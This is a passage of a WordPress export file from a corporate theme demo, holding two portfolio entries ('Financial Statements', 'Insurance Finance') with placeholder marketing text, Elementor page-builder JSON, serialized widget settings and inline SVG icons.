bile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Financial Statements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/financial-statements/</link>
		<pubDate>Fri, 11 Sep 2020 04:46:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=814</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>814</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:46:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:46:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[financial-statements]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[815]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"1deb4b19","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"19b383e9","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"500f054","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3071a763","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"828a94c","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"53d504ac","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"4d6cc997","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f023b1","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"177fdce1","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e8ca3c2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7f78bab3","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"409d65b1","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"30db82d2","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"40a8f280","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4dfc12a3","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6ec964ab","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"14da4924","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"effadd0","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"74a7487","elType":"section","settings":[],"elements":[{"id":"dcf6787","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8311ea5","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"087c50a","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"01a9851","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"7575e2f","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"9b20cfd","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"a9d7a88","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ee94abb","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"9ac6b9b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"3376f08","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"a9cbfa0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"3bc9794","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"3d01ef5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"61c0aec","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0b49dea","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"82e4bdd","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"746adbf","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"9b74ded","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"99c2b4e","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6f802ad","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8f16a4f","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b7177aa","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"3312b41","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"3efc057","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Insurance Finance</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/insurance-finance/</link>
		<pubDate>Fri, 11 Sep 2020 04:48:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=818</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 09, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
